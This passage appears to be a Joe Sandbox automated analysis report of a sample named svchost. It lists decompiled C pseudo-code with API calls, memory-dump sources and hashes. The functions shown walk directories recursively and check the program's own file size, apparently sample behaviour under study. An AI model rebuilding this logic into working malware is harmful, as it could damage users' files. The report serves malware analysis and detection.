                                                                          							 *0x40a5b0 = 1;
                                                                          						}
                                                                          						E00401184(_t35);
                                                                          					}
                                                                          					_t35 = _t42;
                                                                          				}
                                                                          				_t24 = _v32;
                                                                          				 *_t24 = 0;
                                                                          				if(_v24 != 0) {
                                                                          					 *_v32 = _v28;
                                                                          					_t27 = _v24 - _v28;
                                                                          					 *((intOrPtr*)(_v32 + 4)) = _t27;
                                                                          					return _t27;
                                                                          				}
                                                                          				return _t24;
                                                                          			}

                                                                          APIs
                                                                          • VirtualFree.KERNEL32(FFFFFFFF,00000000,00008000), ref: 004013E0
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1188821159.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000002.00000002.1188634524.0000000000400000.00000002.00020000.sdmp
                                                                          • Associated: 00000002.00000002.1189138838.0000000000409000.00000004.00020000.sdmp
                                                                          • Associated: 00000002.00000002.1189771746.0000000000418000.00000002.00020000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: FreeVirtual
                                                                          • String ID:
                                                                          • API String ID: 1263568516-0
                                                                          • Opcode ID: fa7a78eec5dd89a8b83c49400664c27073319ee3a8c610895c3709d3653ec505
                                                                          • Instruction ID: f327295f0dbb7d02968337953404c96d08b75f0734ec548ae522820371e35f3d
                                                                          • Opcode Fuzzy Hash: fa7a78eec5dd89a8b83c49400664c27073319ee3a8c610895c3709d3653ec505
                                                                          • Instruction Fuzzy Hash: CB21E570608741AFD710DF19C880A5FBBE0EB85720F14C96AE8989B7A5D378E841DB5A
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 100%
                                                                          			E00401434(signed int __eax, void** __ecx, intOrPtr __edx) {
                                                                          				signed int _v20;
                                                                          				void** _v24;
                                                                          				void* _t15;
                                                                          				void** _t16;
                                                                          				void* _t17;
                                                                          				signed int _t27;
                                                                          				intOrPtr* _t29;
                                                                          				void* _t31;
                                                                          				intOrPtr* _t32;
                                                                          
                                                                          				_v24 = __ecx;
                                                                          				 *_t32 = __edx;
                                                                          				_t31 = __eax & 0xfffff000;
                                                                          				_v20 = __eax +  *_t32 + 0x00000fff & 0xfffff000;
                                                                          				 *_v24 = _t31;
                                                                          				_t15 = _v20 - _t31;
                                                                          				_v24[1] = _t15;
                                                                          				_t29 =  *0x40a5d4; // 0x571f74
                                                                          				while(_t29 != 0x40a5d4) {
                                                                          					_t17 =  *(_t29 + 8);
                                                                          					_t27 =  *((intOrPtr*)(_t29 + 0xc)) + _t17;
                                                                          					if(_t31 > _t17) {
                                                                          						_t17 = _t31;
                                                                          					}
                                                                          					if(_t27 > _v20) {
                                                                          						_t27 = _v20;
                                                                          					}
                                                                          					if(_t27 > _t17) {
                                                                          						_t15 = VirtualAlloc(_t17, _t27 - _t17, 0x1000, 4); // executed
                                                                          						if(_t15 == 0) {
                                                                          							_t16 = _v24;
                                                                          							 *_t16 = 0;
                                                                          							return _t16;
                                                                          						}
                                                                          					}
                                                                          					_t29 =  *_t29;
                                                                          				}
                                                                          				return _t15;
                                                                          			}

                                                                          APIs
                                                                          • VirtualAlloc.KERNEL32(?,?,00001000,00000004), ref: 004014A1
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1188821159.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000002.00000002.1188634524.0000000000400000.00000002.00020000.sdmp
                                                                          • Associated: 00000002.00000002.1189138838.0000000000409000.00000004.00020000.sdmp
                                                                          • Associated: 00000002.00000002.1189771746.0000000000418000.00000002.00020000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: AllocVirtual
                                                                          • String ID:
                                                                          • API String ID: 4275171209-0
                                                                          • Opcode ID: 6562d44be094aac9c3416d4300413632571bdfff9e6fcfdcc884fc208ae27054
                                                                          • Instruction ID: 651c7d6b6741c998796b49b102b161bb2341ec2eea25b0c045f05b7ed0c0d4f4
                                                                          • Opcode Fuzzy Hash: 6562d44be094aac9c3416d4300413632571bdfff9e6fcfdcc884fc208ae27054
                                                                          • Instruction Fuzzy Hash: E7117072A04701AFC310DF29CD80A2BB7E1EBC4750F15C63DE598673B5D638AC408795
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 93%
                                                                          			E004014C8(void* __eax, void** __ecx, void* __edx) {
                                                                          				int _t7;
                                                                          				void* _t9;
                                                                          				signed int _t14;
                                                                          				intOrPtr* _t19;
                                                                          				signed int _t22;
                                                                          				void** _t23;
                                                                          
                                                                          				_push(__ecx);
                                                                          				 *_t23 = __eax + 0x00000fff & 0xfffff000;
                                                                          				_t22 = __eax + __edx & 0xfffff000;
                                                                          				 *__ecx =  *_t23;
                                                                          				_t7 = _t22 -  *_t23;
                                                                          				__ecx[1] = _t7;
                                                                          				_t19 =  *0x40a5d4; // 0x571f74
                                                                          				while(_t19 != 0x40a5d4) {
                                                                          					_t9 =  *(_t19 + 8);
                                                                          					_t14 =  *((intOrPtr*)(_t19 + 0xc)) + _t9;
                                                                          					if(_t9 <  *_t23) {
                                                                          						_t9 =  *_t23;
                                                                          					}
                                                                          					if(_t22 < _t14) {
                                                                          						_t14 = _t22;
                                                                          					}
                                                                          					if(_t14 > _t9) {
                                                                          						_t7 = VirtualFree(_t9, _t14 - _t9, 0x4000); // executed
                                                                          						if(_t7 == 0) {
                                                                          							 *0x40a5b0 = 2;
                                                                          						}
                                                                          					}
                                                                          					_t19 =  *_t19;
                                                                          				}
                                                                          				return _t7;
                                                                          			}

                                                                          APIs
                                                                          • VirtualFree.KERNEL32(?,?,00004000,?,?,?,?,?,0040172F), ref: 00401522
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1188821159.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000002.00000002.1188634524.0000000000400000.00000002.00020000.sdmp
                                                                          • Associated: 00000002.00000002.1189138838.0000000000409000.00000004.00020000.sdmp
                                                                          • Associated: 00000002.00000002.1189771746.0000000000418000.00000002.00020000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: FreeVirtual
                                                                          • String ID:
                                                                          • API String ID: 1263568516-0
                                                                          • Opcode ID: 366ed2c7ca182d6b4595971b05bf8940527af6e3e06c25c2a4c3263d2ce5472b
                                                                          • Instruction ID: c2f9954cc8299db513f2c37eb2bc070e0fd4fafed15322d1c8bcd52f3136bf23
                                                                          • Opcode Fuzzy Hash: 366ed2c7ca182d6b4595971b05bf8940527af6e3e06c25c2a4c3263d2ce5472b
                                                                          • Instruction Fuzzy Hash: E501F7736043006FC3109E28DDC092A77A4EBC5324F15053EDA85AB3A1D73AAC0587A8
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 31%
                                                                          			E004070DC(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                          				char _v8;
                                                                          				intOrPtr _t19;
                                                                          				intOrPtr _t24;
                                                                          
                                                                          				_push(0);
                                                                          				_push(_t24);
                                                                          				_push(0x407126);
                                                                          				_push( *[fs:eax]);
                                                                          				 *[fs:eax] = _t24;
                                                                          				E004049D0(0, __ebx,  &_v8, __edi, __esi); // executed
                                                                          				E00404C78(E0040340C(_v8), __ebx, 0xa200, 0x40a698, __edi, __esi); // executed
                                                                          				_pop(_t19);
                                                                          				 *[fs:eax] = _t19;
                                                                          				_push(E0040712D);
                                                                          				return E00403094( &_v8);
                                                                          			}

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1188821159.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000002.00000002.1188634524.0000000000400000.00000002.00020000.sdmp
                                                                          • Associated: 00000002.00000002.1189138838.0000000000409000.00000004.00020000.sdmp
                                                                          • Associated: 00000002.00000002.1189771746.0000000000418000.00000002.00020000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: FileModuleName
                                                                          • String ID: MZP
                                                                          • API String ID: 514040917-2889622443
                                                                          • Opcode ID: 41121ee7b25dade0bc9d433c7374af51b0025473e269c79932b73fc9af909746
                                                                          • Instruction ID: dbacf8f9bda0d2f3624fed2e55e69454661720eb62c3ca271fb24a4619442e3b
                                                                          • Opcode Fuzzy Hash: 41121ee7b25dade0bc9d433c7374af51b0025473e269c79932b73fc9af909746
                                                                          • Instruction Fuzzy Hash: 32E09270708304AFE701EB72DC13A19B7ACD78A704FA24877E600AA6D1DA7DAE118519
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 100%
                                                                          			E00404B90(void* __eax) {
                                                                          				signed int _t4;
                                                                          
                                                                          				_t4 = CloseHandle(__eax); // executed
                                                                          				return _t4 & 0xffffff00 | _t4 != 0x00000000;
                                                                          			}

                                                                          APIs
                                                                          • CloseHandle.KERNEL32(00000000,00404CD0,00000000,00404CE6), ref: 00404B91
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1188821159.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000002.00000002.1188634524.0000000000400000.00000002.00020000.sdmp
                                                                          • Associated: 00000002.00000002.1189138838.0000000000409000.00000004.00020000.sdmp
                                                                          • Associated: 00000002.00000002.1189771746.0000000000418000.00000002.00020000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CloseHandle
                                                                          • String ID:
                                                                          • API String ID: 2962429428-0
                                                                          • Opcode ID: ef71f196dd3e8bd5321f6bf3e93503307ae4868d30203b0da39ae7c2a7e1010a
                                                                          • Instruction ID: f540dd3953723152695a7cfd94b4b723d26dbf970bde7b3718d3bc06e0259ed2
                                                                          • Opcode Fuzzy Hash: ef71f196dd3e8bd5321f6bf3e93503307ae4868d30203b0da39ae7c2a7e1010a
                                                                          • Instruction Fuzzy Hash:
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 82%
                                                                          			_entry_(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
                                                                          				void* _v24;
                                                                          				char _v28;
                                                                          				void* _v32;
                                                                          				char _v36;
                                                                          				intOrPtr _t26;
                                                                          				void* _t36;
                                                                          				void* _t47;
                                                                          				void* _t48;
                                                                          				intOrPtr _t71;
                                                                          				void* _t79;
                                                                          				void* _t81;
                                                                          				void* _t86;
                                                                          
                                                                          				_t86 = __fp0;
                                                                          				_t81 = __eflags;
                                                                          				_t76 = __esi;
                                                                          				_t75 = __edi;
                                                                          				_t54 = __ebx;
                                                                          				_v36 = 0;
                                                                          				_v28 = 0;
                                                                          				_v32 = 0;
                                                                          				_v24 = 0;
                                                                          				E00403F14(0x408054);
                                                                          				_push(_t79);
                                                                          				_push(0x408220);
                                                                          				_push( *[fs:eax]);
                                                                          				 *[fs:eax] = _t79 + 0xffffffe0;
                                                                          				E00407080(0x4091a8, 0xb, 0xb);
                                                                          				E00407080(0x4091b4, 9, 9);
                                                                          				E00407080(0x4091c0, 3, 3);
                                                                          				E00407080(0x4091dc, 3, 3);
                                                                          				_t26 =  *0x409210; // 0x40919c
                                                                          				E00407080(_t26, 0xb, 0xb); // executed
                                                                          				E004070DC(__ebx, __edi, __esi, _t81); // executed
                                                                          				E004049D0(0, __ebx,  &_v24, __edi, __esi);
                                                                          				if(E00404F6C(_v24) > 0xa200) {
                                                                          					E00407678(_t54, _t75, _t76); // executed
                                                                          				}
                                                                          				E00407E90(_t54, _t75, _t76); // executed
                                                                          				_t60 = 3;
                                                                          				_t70 = 3;
                                                                          				E00407080(0x4091c4, 3, 3);
                                                                          				_t36 = E00404AE8(_t54, _t75, _t76);
                                                                          				_t83 = _t36;
                                                                          				if(_t36 != 0) {
                                                                          					E004049D0(0, _t54,  &_v28, _t75, _t76);
                                                                          					_push(_v28);
                                                                          					_t60 = 3;
                                                                          					E004031F4( &_v32, 3, 0x4091c4);
                                                                          					_t70 = _v32;
                                                                          					_pop(_t47);
                                                                          					_t48 = E00406FE4(_t47, _t54, _v32, _t83);
                                                                          					_t84 = _t48;
                                                                          					if(_t48 != 0) {
                                                                          						_t70 =  &_v36;
                                                                          						E004049D0(1, _t54,  &_v36, _t75, _t76);
                                                                          						E00407D9C(_v36, _t54,  &_v36, _t75, _t76); // executed
                                                                          					}
                                                                          				}
                                                                          				E004079A0(_t54, _t75, _t76, _t84); // executed
                                                                          				E0040759C(_t54, _t60, _t70, _t75, _t76, _t84, _t86); // executed
                                                                          				_pop(_t71);
                                                                          				 *[fs:eax] = _t71;
                                                                          				_push(E00408227);
                                                                          				return E004030B8( &_v36, 4);
                                                                          			}
                                                                          Instruction address column for the C-code listing above (one address per line, as extracted): 0x004080e4 .. 0x0040821f

                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1188821159.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000002.00000002.1188634524.0000000000400000.00000002.00020000.sdmp
                                                                          • Associated: 00000002.00000002.1189138838.0000000000409000.00000004.00020000.sdmp
                                                                          • Associated: 00000002.00000002.1189771746.0000000000418000.00000002.00020000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: FileFindModule$CloseFirstHandleName
                                                                          • String ID:
                                                                          • API String ID: 2572062711-0
                                                                          • Opcode ID: dd04900b1eda66457b3e54522726fafad356c8816e377336a90270cb981f17ff
                                                                          • Instruction ID: ce7274d5a0203330cd45a7cf6d0e011d083bf460e717dce8afa0a39e5ced3773
                                                                          • Opcode Fuzzy Hash: dd04900b1eda66457b3e54522726fafad356c8816e377336a90270cb981f17ff
                                                                          • Instruction Fuzzy Hash: D4211E70B142054BEB40B7B6C95279F76A5DB88304F50493FE544BB3C2DA3DAD0586AE
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 60%
                                                                          			E004074B4(intOrPtr __eax, void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
                                                                          				intOrPtr _v8;
                                                                          				char _v12;
                                                                          				char _v16;
                                                                          				char _v20;
                                                                          				char _v24;
                                                                          				char _v28;
                                                                          				void* _t34;
                                                                          				intOrPtr _t62;
                                                                          				void* _t71;
                                                                          				void* _t72;
                                                                          				void* _t74;
                                                                          				intOrPtr _t77;
                                                                          
                                                                          				_push(0);
                                                                          				_push(0);
                                                                          				_push(0);
                                                                          				_push(0);
                                                                          				_push(0);
                                                                          				_push(0);
                                                                          				_v8 = __eax;
                                                                          				E004033FC(_v8);
                                                                          				_push(_t77);
                                                                          				_push(0x40758b);
                                                                          				_push( *[fs:eax]);
                                                                          				 *[fs:eax] = _t77;
                                                                          				E004031F4( &_v12, 3, 0x4091dc);
                                                                          				_t49 = E004052AC(_v8, 0, _v12);
                                                                          				_t71 = E0040532C(_t25) - 1;
                                                                          				if(_t71 >= 0) {
                                                                          					_t72 = _t71 + 1;
                                                                          					_t74 = 0;
                                                                          					do {
                                                                          						_t34 = E0040534C(_t49, _t74);
                                                                          						_t81 = _t34;
                                                                          						if(_t34 == 0) {
                                                                          							E00405338(_t49,  &_v28, _t74);
                                                                          							E00403258( &_v24, _v28,  *((intOrPtr*)(_t49 + 0x1c)));
                                                                          							E004071D0(_v24, _t49, _t72, _t74); // executed
                                                                          						} else {
                                                                          							E00405338(_t49,  &_v20, _t74);
                                                                          							E00403258( &_v16, _v20,  *((intOrPtr*)(_t49 + 0x1c)));
                                                                          							E004074B4(_v16, _t49, _t72, _t74, _t81, _a4); // executed; recursive self-call on the entry name built above (E004052AC, API ID FileFind$FirstNext, supplies the entries)
                                                                          						}
                                                                          						_t74 = _t74 + 1;
                                                                          						_t72 = _t72 - 1;
                                                                          					} while (_t72 != 0);
                                                                          				}
                                                                          				E00404520(_t49);
                                                                          				_pop(_t62);
                                                                          				 *[fs:eax] = _t62;
                                                                          				_push(E00407592);
                                                                          				return E004030B8( &_v28, 6);
                                                                          			}
                                                                          Instruction address column for the C-code listing above (one address per line, as extracted): 0x004074b9 .. 0x0040758a

                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1188821159.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000002.00000002.1188634524.0000000000400000.00000002.00020000.sdmp
                                                                          • Associated: 00000002.00000002.1189138838.0000000000409000.00000004.00020000.sdmp
                                                                          • Associated: 00000002.00000002.1189771746.0000000000418000.00000002.00020000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: fd7c348ce77f50c17542cebb3b0538e5ca6a1de9245a361f45dd7a6b294aa538
                                                                          • Instruction ID: 101897594dce54360dc52a275b3a014dbc9cabf376d6d76c5a5bbcf91f550c41
                                                                          • Opcode Fuzzy Hash: fd7c348ce77f50c17542cebb3b0538e5ca6a1de9245a361f45dd7a6b294aa538
                                                                          • Instruction Fuzzy Hash: 53218830B045096FCB04EF65CC8299F77A9EB84304B60447FB801B77C2DA78EE058B55
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 37%
                                                                          			E00406E94(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
                                                                          				char _v12;
                                                                          				char _v16;
                                                                          				char _v20;
                                                                          				intOrPtr* _t20;
                                                                          				void* _t24;
                                                                          				intOrPtr _t40;
                                                                          				void* _t46;
                                                                          
                                                                          				_push(__ebx);
                                                                          				_v16 = 0;
                                                                          				_v20 = 0;
                                                                          				_push(_t46);
                                                                          				_push(0x406f22);
                                                                          				_push( *[fs:eax]);
                                                                          				 *[fs:eax] = _t46 + 0xfffffff0;
                                                                          				E00405008( &_v16, 1, __ecx);
                                                                          				_push( &_v16);
                                                                          				E004031F4( &_v20, 0xb, 0x40919c);
                                                                          				_pop(_t20);
                                                                          				E00403214(_t20, _v20);
                                                                          				_t24 = E00404C78(E0040340C(_v16), 1, 8,  &_v12, __edi, __esi); // executed
                                                                          				if(_t24 != 0) {
                                                                          					E004057D8(__fp0);
                                                                          					asm("fcomp dword [0x406f30]");
                                                                          					asm("fnstsw ax");
                                                                          					asm("sahf");
                                                                          				}
                                                                          				_pop(_t40);
                                                                          				 *[fs:eax] = _t40;
                                                                          				_push(E00406F29);
                                                                          				return E004030B8( &_v20, 2);
                                                                          			}
                                                                          Instruction address column for the C-code listing above (one address per line, as extracted): 0x00406e9a .. 0x00406f21

                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1188821159.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000002.00000002.1188634524.0000000000400000.00000002.00020000.sdmp
                                                                          • Associated: 00000002.00000002.1189138838.0000000000409000.00000004.00020000.sdmp
                                                                          • Associated: 00000002.00000002.1189771746.0000000000418000.00000002.00020000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: LocalPathTempTime
                                                                          • String ID:
                                                                          • API String ID: 2118298429-0
                                                                          • Opcode ID: 4d43c894cee0dd55262f3b1b2c5c40d1f0ba545ea5d4454e7357d5f13f266e22
                                                                          • Instruction ID: 68f96da1d51e9565b10b5108b435a8bc67f0bfec9723d228dfcbae9d3fbb17ab
                                                                          • Opcode Fuzzy Hash: 4d43c894cee0dd55262f3b1b2c5c40d1f0ba545ea5d4454e7357d5f13f266e22
                                                                          • Instruction Fuzzy Hash: 4A0175709042099FDB00EFA5DC5159FB7BDFB45300F52857BE414F36C5DB38AA148A69
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 100%
                                                                          			E004052AC(void* __eax, void* __ecx, void* __edx) {
                                                                          				void* __esi;
                                                                          				void* _t7;
                                                                          				intOrPtr _t11;
                                                                          				void* _t14;
                                                                          
                                                                          				_t14 = __eax;
                                                                          				_t11 =  *0x40447c; // 0x404488
                                                                          				_t7 = E004044F8(_t11, 0);
                                                                          				E00405634(_t7, __edx, _t14, _t14, 0, __ecx); // executed
                                                                          				return _t7;
                                                                          			}
                                                                          Instruction address column for the C-code listing above (one address per line, as extracted): 0x004052b4 .. 0x004052d7

                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1188821159.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000002.00000002.1188634524.0000000000400000.00000002.00020000.sdmp
                                                                          • Associated: 00000002.00000002.1189138838.0000000000409000.00000004.00020000.sdmp
                                                                          • Associated: 00000002.00000002.1189771746.0000000000418000.00000002.00020000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: FileFind$FirstNext
                                                                          • String ID:
                                                                          • API String ID: 1690352074-0
                                                                          • Opcode ID: 4f493d9307b3d4b817a7e836544abeb962cbb198da26cb643227803e88156b29
                                                                          • Instruction ID: b59b8e1bf290491f0b5bd01f3f1f1884d5f58955f35eb0aac9512fedb03d6d3a
                                                                          • Opcode Fuzzy Hash: 4f493d9307b3d4b817a7e836544abeb962cbb198da26cb643227803e88156b29
                                                                          • Instruction Fuzzy Hash: 70D0A76230111417870065BF2C84C2BF3CDCBCD565391413AB208D7341DD35AC0742B8
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 37%
                                                                          			E00402448(void* __eax) {
                                                                          				void* _t3;
                                                                          				void* _t6;
                                                                          
                                                                          				if(__eax <= 0) {
                                                                          					_t6 = 0;
                                                                          				} else {
                                                                          					_t3 =  *0x409030(); // executed
                                                                          					_t6 = _t3;
                                                                          					if(_t6 == 0) {
                                                                          						E00402530(1);
                                                                          					}
                                                                          				}
                                                                          				return _t6;
                                                                          			}

                                                                          • Instruction addresses: 0x0040244b 0x00402462 0x0040244d 0x0040244d 0x00402453 0x00402457 0x0040245b 0x0040245b 0x00402457 0x00402467

                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1188821159.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000002.00000002.1188634524.0000000000400000.00000002.00020000.sdmp
                                                                          • Associated: 00000002.00000002.1189138838.0000000000409000.00000004.00020000.sdmp
                                                                          • Associated: 00000002.00000002.1189771746.0000000000418000.00000002.00020000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 8dfeac06a829af607fe89a8817dc8f9230199d36438cef303ac21605a03e7c3b
                                                                          • Instruction ID: d53205a698bee5913c9905fe3b2fa7a5b2040cee35667c8cc0b5dc0e3ef69e66
                                                                          • Opcode Fuzzy Hash: 8dfeac06a829af607fe89a8817dc8f9230199d36438cef303ac21605a03e7c3b
                                                                          • Instruction Fuzzy Hash: 6AC08C6030270387DB202AFA1FDC113125C3F24205300403BA901F13D3EAF8CD089A2F
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 100%
                                                                          			E00406510(void* __eax, void* __edx) {
                                                                          				void* _t3;
                                                                          				void* _t4;
                                                                          				void* _t8;
                                                                          				void* _t9;
                                                                          				intOrPtr* _t10;
                                                                          
                                                                          				_t3 = E00406B48(_t10, _t4, __edx, 0, _t8, _t9); // executed
                                                                          				return _t3;
                                                                          			}

                                                                          • Instruction addresses: 0x00406517 0x0040651d

                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1188821159.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000002.00000002.1188634524.0000000000400000.00000002.00020000.sdmp
                                                                          • Associated: 00000002.00000002.1189138838.0000000000409000.00000004.00020000.sdmp
                                                                          • Associated: 00000002.00000002.1189771746.0000000000418000.00000002.00020000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: IconInfo
                                                                          • String ID:
                                                                          • API String ID: 2096194817-0
                                                                          • Opcode ID: 3aa0d1c17f7541c88f4a23eede43810dced38d8a94ff8caad404287aac718eb2
                                                                          • Instruction ID: 2c83cf8f1268621ffc1ea80895ab672af1bae2362a1aae74aa6b220125402c61
                                                                          • Opcode Fuzzy Hash: 3aa0d1c17f7541c88f4a23eede43810dced38d8a94ff8caad404287aac718eb2
                                                                          • Instruction Fuzzy Hash: 92A002C6751214079B4CE53F1C6292A729F07C8615759C87A7906DA289CD38E8512155
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Non-executed Functions

                                                                          APIs
                                                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,00000000), ref: 0040F16D
                                                                          • FindNextFileA.KERNEL32(00000000,?,?,?,00000000,00000000), ref: 0040F1CF
                                                                          • FindClose.KERNEL32(00000000,00000000,?,?,?,00000000,00000000), ref: 0040F1D9
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1189138838.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000002.00000002.1188634524.0000000000400000.00000002.00020000.sdmp
                                                                          • Associated: 00000002.00000002.1188821159.0000000000401000.00000020.00020000.sdmp
                                                                          • Associated: 00000002.00000002.1189771746.0000000000418000.00000002.00020000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Find$File$CloseFirstNext
                                                                          • String ID: *.*
                                                                          • API String ID: 3541575487-438819550
                                                                          • Opcode ID: 1eb9b05f6550193698417fdfd1abd8b4f720dd67f104cddbbfc16bbf0ec42b4c
                                                                          • Instruction ID: 21f552544a71644aa5a29d04448db43bc273ae507e021618840bae1d7485b843
                                                                          • Opcode Fuzzy Hash: 1eb9b05f6550193698417fdfd1abd8b4f720dd67f104cddbbfc16bbf0ec42b4c
                                                                          • Instruction Fuzzy Hash: C431B071704100ABDB15AB66D88286B37A9DF86328720457FF804EF6C7DA7CDC1A8699
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,00000000), ref: 0040F16D
                                                                          • FindNextFileA.KERNEL32(00000000,?,?,?,00000000,00000000), ref: 0040F1CF
                                                                          • FindClose.KERNEL32(00000000,00000000,?,?,?,00000000,00000000), ref: 0040F1D9
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1189138838.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000002.00000002.1188634524.0000000000400000.00000002.00020000.sdmp
                                                                          • Associated: 00000002.00000002.1188821159.0000000000401000.00000020.00020000.sdmp
                                                                          • Associated: 00000002.00000002.1189771746.0000000000418000.00000002.00020000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Find$File$CloseFirstNext
                                                                          • String ID: *.*
                                                                          • API String ID: 3541575487-438819550
                                                                          • Opcode ID: ca5e68894038c338b17cd596c0991537003cad852163082c19a1be6d7e7f9c81
                                                                          • Instruction ID: 271996e333eb2d0f8e3e23676571f4307960fb9fe6b8e39aca4bbd563d4a420a
                                                                          • Opcode Fuzzy Hash: ca5e68894038c338b17cd596c0991537003cad852163082c19a1be6d7e7f9c81
                                                                          • Instruction Fuzzy Hash: 1031C171700100ABDB14EF67D88286B369ADF85328720457FF804EF6C7EA7CDC0A8699
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 46%
                                                                          			E0040627C(void* __eax, void* __ebp, void* __eflags) {
                                                                          				struct HDC__* _v8;
                                                                          				intOrPtr _v12;
                                                                          				intOrPtr _v36;
                                                                          				intOrPtr _v40;
                                                                          				struct HDC__* _v44;
                                                                          				struct HDC__* _v60;
                                                                          				struct HDC__* _v68;
                                                                          				struct HDC__* _v72;
                                                                          				void* _t59;
                                                                          				struct HBITMAP__* _t62;
                                                                          				void* _t68;
                                                                          				void* _t71;
                                                                          				int _t72;
                                                                          				int _t75;
                                                                          				int _t80;
                                                                          				void* _t81;
                                                                          				void* _t85;
                                                                          				void* _t94;
                                                                          				void* _t100;
                                                                          				void* _t114;
                                                                          				struct HDC__* _t116;
                                                                          				struct HDC__* _t119;
                                                                          				signed int _t121;
                                                                          				struct HBITMAP__* _t124;
                                                                          				struct HBITMAP__* _t125;
                                                                          				RECT* _t126;
                                                                          				void* _t128;
